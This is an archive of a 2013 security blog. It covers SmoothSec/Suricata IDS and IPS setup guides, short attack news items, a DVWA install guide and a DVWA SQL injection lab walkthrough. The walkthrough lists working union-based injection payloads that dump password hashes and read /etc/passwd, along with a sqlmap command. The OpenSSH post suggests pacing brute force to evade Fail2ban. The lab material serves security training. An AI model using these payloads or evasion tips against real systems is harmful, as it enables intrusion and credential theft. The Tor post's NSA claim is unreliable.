Monday, August 26, 2013

HOWTO : SmoothSec 3.2 (beta) as Intrusion Prevention System (IPS)

I am going to tell you how to build an affortable Intrusion Prevention System (IPS) at home or SOHO or small business. With the default setting of Suricata, the performance of SmoothSec is not too good for watching Youtube (360p) with the following hardware. However, when it is tuned, it can watch the Youtube up to 720p resolution with the following hardware via 10Mb internet connection. Yes, it is still lagging, but you can watch. Please also note that the connection is also behind a router (Untangle with the same motherboard, CPU and RAM).

Hardware

Motherboard - Intel Desktop Board D510MO
RAM - 4GB DDR2 (2 x 2GB)
Hard Drive - 320GB
Network Card 0 - Onboard Gigabit
Network Card 1 - TP-Link TG-3269 Gigabit PCI Network Adapter (with low profile)
Network Card 2 - D-Link DUB-E100 USB 2.0 Fast Ethernet Adapter (up to 200MB)

Software

Operating System - SmoothSec 3.2 beta (64-bit). The beta version is no longer exist. Please go to official site for the Version 3.2. The beta and official version are same. The official site is at here.

Setup

Internet -- Router -- SmoothSec -- Switch -- Personal Computers

Network Card 0 and 1 will be bridged up while Network Card 2 will be a management interface.

Step 1 :

First of all, SmoothSec (Network Card 2) is connected to the Switch while Network Card 0 and 1 do not connect to the router. It is because you need to connect to the internet for the installation.

Step 2 (IDS Mode) :

Install SmoothSec as usual. When you prompt for install non-free network interface firmware, just ignore it. After installed, the box will be reboot.

Login as "root" with password "toor".

Step 3 (Bug Fix):

Suricata

nano /etc/suricata/suricata.yaml

Locate "- fast:" and change "enabled: no" to "enabled: yes".

Locate "- drop:" and change "enabled: no" to "enabled: yes".

Locate "HOME_NET: '[192.168.1.0/24]'" and change to "HOME_NET: '[192.168.0.0/24]'".

*or your network subnet.

Time Zone for Snorby

If your time zone is not UTC, you should run the following command :

dpkg-reconfigure tzdata

Set the time zone for "UTC" at "None of the above"; otherwise, the Snorby will reported wrong timestamp.

nano /var/www/snorby/config/snorby_config.yml

Make sure "production:" and "timezone_search: false".

Make sure "time_zone: 'UTC'" is commented.

Set your time zone at the Snorby web interface when it is available after Step 5.

Email feature of Snorby

apt-get install postfix libxrender-dev libfontconfig1

Configure the Postfix properly according to your network at "/etc/postfix/main.cf".

nano /var/www/snorby/config/initializers/mail_config.rb

Uncomment the lines just below "# Sendmail Example:".

Step 4 :

Connect Network Card 0 to router and Network Card 1 to Switch.

Normally, Network Card 0 will be eth0, Network Card 1 will be eth1 and Network Card 2 will be eth2.

nano /etc/network/interfaces

Comment all about eth2 entries.

Append the following :

auto eth2
iface eth2 inet static
   address 192.168.0.120
   netmask 255.255.255.0
   gateway 192.168.0.1


* where the "address" is your SmoothSec IP address and "gateway" is the IP address of your router.

nano /etc/init.d/bridge

Change "net1=eth1" to "net1=eth0"
Change "net2=eth2" to "net2=eth1"
Change "brctl addif $br eth1" to "brctl addif $br eth0"
Change "brctl addif $br eth2" to "brctl addif $br eth1"

update-rc.d bridge defaults

Step 5:

Run the script "smoothsec.first.setup" in the terminal.

Type "br0" when asking for monitor network interface.

Select "Snort" or "Suricata" as IDS Engine. I choose "Suricata".

Then reboot.

Once boot up, go to one of the Personal Computers and browse "https://192.168.0.120". Then set the time zone and your report email address accordingly.

Step 6 (IPS Mode):

Make sure your box is running in IDS mode at least for a day and then perform the following to switch it to IPS mode (inline mode). Otherwise, Snorby cannot capture the traffic.

Suricata

nano /etc/suricata/suricata.yaml

Locate "rule-files:" and append "- local.rules" under "- emerging.rules".

cd /etc/suricata/rules

touch local.rules

* you can add your rules at "local.rules". Once it is added, you need to restart the suricata :

Locate "nfq:" and uncomment all the items at the section but except "# fail-open: yes" as it requires a Linux kernel version 3.6 or greater.

/etc/init.d/suricata restart

* you need to wait for several minutes before the box can be connected to internet.

PulledPork

nano /etc/pulledpork/suricata/dropsid.conf

Append the following :

pcre:MS(0[0-9]|1[0-9]-\d+,bugtraq:\d+,cve:20[0-9][0-9]-\d+

* to drop all the vulnerabilities in vulnerability reports.

IPtables

Add the following lines above "exit 0" at "/etc/rc.local" :

nano /etc/rc.local

iptables -A INPUT -i br0 -j NFQUEUE --queue-balance 0:3
iptables -A OUTPUT -o br0 -j NFQUEUE --queue-balance 0:3
iptables -A FORWARD -i br0 -o br0 -j NFQUEUE --queue-balance 0:3

* note that I have Quard-core CPU. If you have 8-core, "--queue-balance" will be "0:7".

Suricata Startup Script

nano /etc/init.d/suricata

Locate "/usr/local/bin/suricata --user suricata -c /etc/suricata/suricata.yaml -i $INTERFACES -D"

Replace with "/usr/local/bin/suricata --user suricata -c /etc/suricata/suricata.yaml -q0 -q1 -q2 -q3 -D"

Locate "/usr/local/bin/pigsty -c /etc/pigsty/suricata.pigsty.config.js -i $INTERFACES -n 'Suricata' -d /var/log/suricata/ -m unified2.alert.* -D"

Replace with "/usr/local/bin/pigsty -c /etc/pigsty/suricata.pigsty.config.js -i br0 -n 'Suricata' -d /var/log/suricata/ -m unified2.alert.* -D"


* make sure you do it twice as there are 2 entries at the file.
** if you have 8-core CPU, it will be "-q0 -q1 -q2 -q3 -q4 -q5 -q6 -q7".

Then reboot your box. Please note that you are required to wait for several minutes before you can connect to the internet.

Step 7:

To update SmoothSec, you need to do the following commands (you can make a script to do so). The rules will be updated automatically in the early morning every day.

apt-get update
apt-get dist-upgrade
apt-get --purge autoclean
apt-get --purge autoremove
# update SmoothSec
cd /root/updates/
git pull origin master
# update Snorby
cd /var/www/snorby
git pull origin master
rake snorby:update
cd ~
# update pigsty
npm update -g pigsty
npm update -g pigsty-mysql
# update Suricata rules
smoothsec.suricata.rules.update


Step 8 (Suricata Tuning) :

nano /etc/suricata/suricata.yaml

Change "max-pending-packets:1024" to "max-pending-packets: 65000".

Locate "detect-engine" and change "- profile: medium" to "- profile: high".

Locate "mpm-algo: ac" and insert "detect-engine.sgh-mpm-context: full" above "mpm-algo: ac".

Then restart the Suricata. Please wait for several minutes before you can connect to the internet.

/etc/init.d/suricata restart

Known Issue

(1) You should remember that your box is in UTC time zone.
(2) You may need to disable the rule (1:2100527), which is for same IP address scanning/connection, at "/etc/pulledpork/suricata/disablesid.conf". After that, make sure you restart the Suricata.
(3) If you use other pattern-matcher, such as b2g, b3g, wumanber, other than ac, you will need more than 4GB RAM.
(4) Using ac as pattern-matcher with 4GB of memory with Intel Atom D510 CPU, you will encounter lagging while watching Youtube (720p resolution) with about 20,000 active rules.
(5) If you have nVidia display card (make sure you have installed nVidia and Cuda drivers), you can compile Suricata with the flag "--enable-cuda --enable-nfqueue" and configure "/etc/suricata/suricata.yaml" with "mpm-algo: b2g_cuda". Please note that you should have more than 4GB of memory. And the setting is similar or same as above.

Debug the mailing feature

Do not run the following commands unless you really need to.

cd /var/www/snorby

bundle exec rails c production
Snorby::Jobs::SensorCacheJob.new(true).perform
Snorby::Jobs::DailyCacheJob.new(true).perform
(this command is invalid for version 2.6.2)

Reference

Snorby GitHub
Suricata
SmoothSec
Pigsty
Suricata Performance Tuning
SmoothSec WiKi - for installation

That's all! See you.

Thursday, August 22, 2013

HOWTO : SmoothSec 3.2 (beta) as Intrusion Detection System (IDS)

I am going to tell you how to build an affortable Intrusion Detection System (IDS) at home or SOHO or small business. For building an Intrusion Prevention System (IPS), I will write another article about it later.

Hardware

Motherboard - Intel Desktop Board D510MO
RAM - 4GB DDR2 (2 x 2GB)
Hard Drive - 320GB
Network Card 0 - Onboard Gigabit
Network Card 1 - TP-Link TG-3269 Gigabit PCI Network Adapter (with low profile)
Network Card 2 - D-Link DUB-E100 USB 2.0 Fast Ethernet Adapter (up to 200MB)

Software

Operating System - SmoothSec 3.2 beta (64-bit). The beta version is no longer exist. Please go to official site for the Version 3.2. The beta and official version are same. The official site is at here.

Setup

Internet -- Router -- SmoothSec -- Switch -- Personal Computers

Network Card 0 and 1 will be bridged up while Network Card 2 will be a management interface.

Step 1 :

First of all, SmoothSec (Network Card 2) is connected to the Switch while Network Card 0 and 1 do not connect to the router. It is because you need to connect to the internet for the installation.

Step 2 :

Install SmoothSec as usual. When you prompt for install non-free network interface firmware, just ignore it. After installed, the box will be reboot.

Login as "root" with password "toor".

Step 3 (Bug Fix):

Suricata

nano /etc/suricata/suricata.yaml

Locate "- fast:" and change "enabled: no" to "enabled: yes".

Locate "- drop:" and change "enabled: no" to "enabled: yes".

Locate "HOME_NET: '[192.168.1.0/24]'" and change to "HOME_NET: '[192.168.0.0/24]'".

*or your network subnet.

Time Zone for Snorby

If your time zone is not UTC, you should run the following command :

dpkg-reconfigure tzdata

Set the time zone for "UTC" at "None of the above"; otherwise, the Snorby will reported wrong timestamp.

nano /var/www/snorby/config/snorby_config.yml

Make sure "production:" and "timezone_search: false".

Make sure "time_zone: 'UTC'" is commented.

Set your time zone at the Snorby web interface when it is available after Step 5.

Email feature of Snorby

apt-get install postfix libxrender-dev libfontconfig1

Configure the Postfix properly according to your network at "/etc/postfix/main.cf".

nano /var/www/snorby/config/initializers/mail_config.rb

Uncomment the lines just below "# Sendmail Example:".

Step 4 :

Connect Network Card 0 to router and Network Card 1 to Switch.

Normally, Network Card 0 will be eth0, Network Card 1 will be eth1 and Network Card 2 will be eth2.

nano /etc/network/interfaces

Comment all about eth2 entries.

Append the following :

auto eth2
iface eth2 inet static
   address 192.168.0.120
   netmask 255.255.255.0
   gateway 192.168.0.1


* where the "address" is your SmoothSec IP address and "gateway" is the IP address of your router.

nano /etc/init.d/bridge

Change "net1=eth1" to "net1=eth0"
Change "net2=eth2" to "net2=eth1"
Change "brctl addif $br eth1" to "brctl addif $br eth0"
Change "brctl addif $br eth2" to "brctl addif $br eth1"

update-rc.d bridge defaults

Step 5:

Run the script "smoothsec.first.setup" in the terminal.

Type "br0" when asking for monitor network interface.

Select "Snort" or "Suricata" as IDS Engine. I choose "Suricata".

Then reboot.

Once boot up, go to one of the Personal Computers and browse "https://192.168.0.120". Then set the time zone and your report email address accordingly.

Step 6:

To update SmoothSec, you need to do the following commands (you can make a script to do so). The rules will be updated automatically in the early morning every day.

apt-get update
apt-get dist-upgrade
apt-get --purge autoclean
apt-get --purge autoremove
# update SmoothSec
cd /root/updates/
git pull origin master
# update Snorby
cd /var/www/snorby
git pull origin master
rake snorby:update
cd ~
# update pigsty
npm update -g pigsty
npm update -g pigsty-mysql
# update Suricata rules
smoothsec.suricata.rules.update

Known Issue

Nil.

You should remember that your box is in UTC time zone.

Debug the mailing feature

Do not run the following commands unless you really need to.

cd /var/www/snorby

bundle exec rails c production
Snorby::Jobs::SensorCacheJob.new(true).perform
Snorby::Jobs::DailyCacheJob.new(true).perform
(This command is invalid for Snorby version 2.6.2)

Reference

Snorby GitHub
Suricata
SmoothSec
Pigsty
SmoothSec WiKi - for installation

That's all! See you.

Thursday, August 15, 2013

Quick Blind TCP Connection Spoofing with SYN Cookies

A various of Linux distributions including Ubuntu and Debian is enabled TCP SYN Cookies defence mechanism against SYN-Flooding DoS Attacks by default.

However, this defence mechanism may led to an attack. Jakob Lell developed a PoC exploit and performed a test. He found out that there is about one successful spoof connection every 10 minutes on a 3 year old notebook (HP 6440b, i5-430M CPU and Marvell 88E8072 gigabit NIC) client and a desktop computer as the server. The test was running 10.5 hour overnight and successfully spoofed 64 connections.

He also stated that if the TCP SYN Cookies is not enabled, the attack may also be successful but it may need more time.

Consider what happen if an attacker spoofed a SSH connection without credentials.

Reference

[1] Full Disclosure
[2] Jakob Lell's Blog

That's all! See you.

Saturday, August 10, 2013

OpenSSH Time Brute Force

In 2006, there is a bug report about OpenSSH time brute forcing. However, the developers of the OpenSSH stated that it is not a bug and they would not fix it.

When an attacker try to brute force OpenSSH account, s/he will issue a very long password (such as 39,000 in length). When the account name exists, the response time will be in very high delay comparing with the non-existing one.

TurboBorland developed a Proof-of-Concept (PoC) code for the purpose.

He stated that he cannot test it successfully in the local network but it work perfectly in internet. However, I did not test it myself. If you are interested in it, you can try.

If the target is implemented Fail2ban, you can try to delay the attack timing in order to avoid from being blocked or banned.

That's all! See you.

Thursday, August 08, 2013

HOWTO : Enable TLS/1.1 on Firefox 23.0

Firefox 23.0 is released. It supports TLS/1.1 but it is not enabled by default. Hiawatha WebServer developer, Hugo Leisink, suggests to enable it. He suggests to set the value of security.tls.version.max to 2.

Since the security.tls.version.min setting of Firefox 23.0 is 0, the security would be fallback to lower encryption protocol when the web server does not support TLS/1.1. So, it is safe to enable it.

How to enable it? Just keyin "about:config" on the url field of Firefox 23.0 and search for "security.tls.version.max". Then set the value 1 to 2.

Meanwhile, Hiawatha WebServer already support TLS/1.1 and she is one of the most lightweight and secured web server by design.

That's all! See you.

Tuesday, August 06, 2013

Anonymity Network (Tor) has been compromised by NSA

Many hidden servers of Tor network are disappeared since this Sunday. The Freedom Hosting (which hosting a lot of hidden services servers) founder has been arrested and charged for managing some Porn sites.

The article tell you something about that. This article believed that the server of Freedom Hosting is compromised by FBI with malicious javascript.

However, Cryptocloud find out that the javascript was planted by National Security Agency (NSA).

It is true that the Tor network can be monitored by NSA.

If you are using Tor network, make sure you are using the latest version of Firefox and Tor software as well as to use NoScript (Firefox addon) to block the javascript and flash. Make sure you are not using outdated Firefox such as Tor Browser Bundle.

Or, you can consider to use my project namely NightHawk with the latest version of Firefox and NoScript.

That's all! See you.

Friday, August 02, 2013

HOWTO : DVWA SQL Injection

Security level = low

99 or 1=1
- will display all the records

99 or 1=1 union select 1,2,3
- will display "The used SELECT statements have a different number of columns" error message

99 or 1=1 union select 1,2
- no error message but display all records

99 or 1=1 union select null,null
- no error message but display all records

99 or 1=1 union select version(),database()
- will display the version of MySQL and the database name - dvwa

99 or 1=1 union select null, user()
or
99 or 1=1 union select user(), null
- will display the current user of the database

99 or 1=1 union select null, table_name from information_schema.tables
- will display all the table names

99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users'
- will display the users table column list

99 or 1=1 union select null, concat(first_name,0x0a,password) from users
- we are looking for users table's first_name and password

99 or 1=1 union select null,@@datadir
- will display the mysql directory

99 or 1=1 union all select null,load_file('/etc/passwd')
- will display the content of /etc/passwd

Security level = medium

99 or 1=1
- will display all the records

99 or 1=1 union select 1,2,3
- will display "The used SELECT statements have a different number of columns" error message

99 or 1=1 union select 1,2
- no error message but display all records

99 or 1=1 union select null,null
- no error message but display all records

99 or 1=1 union select version(),database()
- will display the version of MySQL and the database name - dvwa

99 or 1=1 union select null, user()
or
99 or 1=1 union select user(), null
- will display the current user of the database

99 or 1=1 union select null, table_name from information_schema.tables
- will display all the table names

99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns
- since where clause cannot be used, all column name should be listed

or

99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name=0x7573657273
- where 0x7573657273 is Hex value of "users"

99 or 1=1 union select null, concat(first_name,0x0a,password) from users
- we are looking for users table's first_name and password

99 or 1=1 union select null,@@datadir
- will display the mysql directory

sqlmap for Security = low

./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns

For Security = medium is similar.

That's all! See you!

HOWTO : Install DVWA on Ubuntu Server 12.04 LTS

Step 1 :

Download DVWA.

wget https://github.com/RandomStorm/DVWA/archive/v1.0.8.zip

Step 2 :

Install essential packages if you do not install LAMP when installing the Ubuntu Server.

sudo apt-get install apache2 mysql-server php5 unzip php5-mysql php-pear*

* make sure you remember the root password of MySQL, e.g. dvwapass

Step 3 :

Extract DVWA.

sudo cp v1.0.8.zip /var/www/
unzip v1.0.8.zip


Step 4 :

sudo nano /var/www/DVWA/config/config.inc.php

Change the "db_password" to the captioned root password, e.g. dvwapass.

sudo nano /etc/apache2/conf.d/php.ini

change "allow_url_include = Off" to "allow_url_inclue = On".

sudo chmod -R 777 /var/www/DVWA/hackable/uploads/

Step 5 :

Create Database.

mysql -u root -p
create database dvwa;
quit


Step 6 :

Point your Firefox to "http://192.168.0.10/DVWA/setup.php" to create/reset database.

* where 192.168.0.10 is the IP address of the Ubuntu Server

Step 7 :

Then point your Firefox to "http://192.168.0.10/DVWA/index.php".

User name is "admin" and Password is "password".

That's all! See you.